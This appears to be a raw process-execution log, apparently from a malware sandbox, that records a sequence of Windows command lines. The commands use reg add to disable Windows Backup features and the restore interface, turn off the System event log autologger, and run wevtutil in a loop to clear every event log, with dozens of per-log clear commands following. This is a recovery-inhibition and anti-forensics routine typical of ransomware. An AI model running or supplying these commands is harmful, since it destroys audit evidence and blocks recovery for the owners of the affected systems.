reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToDisk /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToNetwork /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToNetwork /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToOptical /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToOptical /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupLauncher /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupLauncher /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableRestoreUI /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableRestoreUI /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupUI /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupUI /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableSystemBackupUI /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableSystemBackupUI /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v OnlySystemBackup /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v OnlySystemBackup /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToDisk /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToDisk /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToNetwork /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToNetwork /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToOptical /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToOptical /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoRunNowBackup /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoRunNowBackup /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-System\{9580d7dd-0379-4658-9870-d5be7d52d6de} /v Enable /t REG_DWORD /d 0 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-System\{9580d7dd-0379-4658-9870-d5be7d52d6de} /v Enable /t REG_DWORD /d 0 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c for /F "tokens=*" %s in ('wevtutil.exe el') DO wevtutil.exe cl "%s"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wevtutil.exe el

C:\Windows\system32\wevtutil.exe

wevtutil.exe el

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "AMSI/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "AirSpaceChannel"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Application"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "DirectShowFilterGraph"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "DirectShowPluginControl"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Els_Hyphenation/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "EndpointMapper"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "FirstUXPerf-Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "ForwardedEvents"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "General Logging"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "HardwareEvents"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "IHM_DebugChannel"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Intel-iaLPSS-GPIO/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Intel-iaLPSS-I2C/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Intel-iaLPSS2-GPIO2/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Intel-iaLPSS2-GPIO2/Performance"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Intel-iaLPSS2-I2C/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Intel-iaLPSS2-I2C/Performance"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Internet Explorer"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Key Management Service"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "MF_MediaFoundationDeviceMFT"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "MF_MediaFoundationDeviceProxy"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "MF_MediaFoundationFrameServer"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "MedaFoundationVideoProc"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "MedaFoundationVideoProcD3D"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "MediaFoundationAsyncWrapper"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "MediaFoundationContentProtection"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "MediaFoundationDS"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "MediaFoundationDeviceProxy"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "MediaFoundationMP4"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "MediaFoundationMediaEngine"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "MediaFoundationPerformance"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "MediaFoundationPerformanceCore"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "MediaFoundationPipeline"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "MediaFoundationPlatform"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "MediaFoundationSrcPrefetch"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-AppV-Client-Streamingux/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-AppV-Client/Admin"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-AppV-Client/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-AppV-Client/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-AppV-Client/Virtual Applications"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-AppV-SharedPerformance/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Client-Licensing-Platform/Admin"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Client-Licensing-Platform/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Client-Licensing-Platform/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-IE/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-IEFRAME/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-JSDumpHeap/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-OneCore-Setup/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-PerfTrack-IEFRAME/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-PerfTrack-MSHTML/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-User Experience Virtualization-Admin/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-User Experience Virtualization-Agent Driver/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-User Experience Virtualization-Agent Driver/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-User Experience Virtualization-App Agent/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-User Experience Virtualization-App Agent/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-User Experience Virtualization-App Agent/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-User Experience Virtualization-IPC/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-User Experience Virtualization-SQM Uploader/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-User Experience Virtualization-SQM Uploader/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-User Experience Virtualization-SQM Uploader/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-AAD/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-AAD/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-ADSI/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-ASN1/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-ATAPort/General"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-ATAPort/SATA-LPM"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-ActionQueue/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-All-User-Install-Agent/Admin"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-AllJoyn/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-AllJoyn/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-AppHost/Admin"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-AppHost/ApplicationTracing"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-AppHost/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-AppHost/Internal"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-AppID/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-AppLocker/EXE and DLL"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-AppLocker/MSI and Script"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-AppLocker/Packaged app-Deployment"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-AppLocker/Packaged app-Execution"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-AppModel-Runtime/Admin"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-AppModel-Runtime/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-AppModel-Runtime/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-AppModel-Runtime/Diagnostics"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-AppModel-State/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-AppModel-State/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-AppReadiness/Admin"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-AppReadiness/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-AppReadiness/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-AppSruProv"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-AppXDeployment/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-AppXDeployment/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-AppXDeploymentServer/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-AppXDeploymentServer/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-AppXDeploymentServer/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-AppXDeploymentServer/Restricted"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-ApplicabilityEngine/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-ApplicabilityEngine/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Admin"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Application-Experience/Compatibility-Infrastructure-Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Compatibility-Assistant"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Compatibility-Assistant/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Compatibility-Assistant/Trace"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Compatibility-Troubleshooter"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Inventory"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Telemetry"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Application-Experience/Steps-Recorder"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-AppxPackaging/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-AppxPackaging/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-AppxPackaging/Performance"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-AssignedAccess/Admin"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-AssignedAccess/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-AssignedAccessBroker/Admin"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-AssignedAccessBroker/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-AsynchronousCausality/Causality"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Audio/CaptureMonitor"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Audio/GlitchDetection"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Audio/Informational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Audio/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Audio/Performance"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Audio/PlaybackManager"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Audit/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Authentication User Interface/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Authentication/AuthenticationPolicyFailures-DomainController"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Authentication/ProtectedUser-Client"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Authentication/ProtectedUserFailures-DomainController"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Authentication/ProtectedUserSuccesses-DomainController"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-AxInstallService/Log"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-BTH-BTHPORT/HCI"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-BTH-BTHPORT/L2CAP"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-BTH-BTHUSB/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-BTH-BTHUSB/Performance"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-BackgroundTaskInfrastructure/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-BackgroundTaskInfrastructure/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-BackgroundTransfer-ContentPrefetcher/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Backup"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Base-Filtering-Engine-Connections/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Base-Filtering-Engine-Resource-Flows/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Battery/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Biometrics/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Biometrics/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-BitLocker-DrivePreparationTool/Admin"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-BitLocker-DrivePreparationTool/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-BitLocker-Driver-Performance/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-BitLocker/BitLocker Management"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-BitLocker/BitLocker Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-BitLocker/Tracing"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Bits-Client/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Bits-Client/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Bluetooth-BthLEPrepairing/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Bluetooth-Bthmini/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Bluetooth-MTPEnum/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Bluetooth-Policy/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-BranchCache/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-BranchCacheClientEventProvider/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-BranchCacheEventProvider/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-BranchCacheMonitoring/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-BranchCacheSMB/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-BranchCacheSMB/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-CAPI2/Catalog Database Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-CAPI2/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-CDROM/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-COM/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-COM/ApartmentInitialize"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-COM/ApartmentUninitialize"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-COM/Call"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-COM/CreateInstance"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-COM/ExtensionCatalog"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-COM/FreeUnusedLibrary"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-COM/RundownInstrumentation"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-COMRuntime/Activations"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-COMRuntime/MessageProcessing"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-COMRuntime/Tracing"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-CertPoleEng/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-CertificateServicesClient-CredentialRoaming/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-CertificateServicesClient-Lifecycle-System/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-CertificateServicesClient-Lifecycle-User/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Cleanmgr/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-ClearTypeTextTuner/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-CloudStore/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-CloudStore/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-CmiSetup/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-CodeIntegrity/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-CodeIntegrity/Verbose"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-ComDlg32/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-ComDlg32/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Compat-Appraiser/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Compat-Appraiser/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Containers-BindFlt/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Containers-BindFlt/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Containers-Wcifs/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Containers-Wcifs/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Containers-Wcnfs/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Containers-Wcnfs/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-CoreApplication/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-CoreApplication/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-CoreApplication/Tracing"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-CoreSystem-SmsRouter-Events/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-CoreSystem-SmsRouter-Events/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-CoreWindow/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-CoreWindow/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-CorruptedFileRecovery-Client/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-CorruptedFileRecovery-Server/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Crashdump/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-CredUI/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Crypto-BCRYPT/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Crypto-CNG/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Crypto-DPAPI/BackUpKeySvc"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Crypto-DPAPI/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Crypto-DPAPI/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Crypto-DSSEnh/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Crypto-NCrypt/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Crypto-RNG/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Crypto-RSAEnh/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-D3D10Level9/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-D3D10Level9/PerfTiming"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DAL-Provider/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DAL-Provider/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DAMM/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DCLocator/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DDisplay/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DDisplay/Logging"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DLNA-Namespace/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DNS-Client/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DSC/Admin"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DSC/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DSC/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DSC/Operational"

C:\Windows\system32\wevtutil.exe

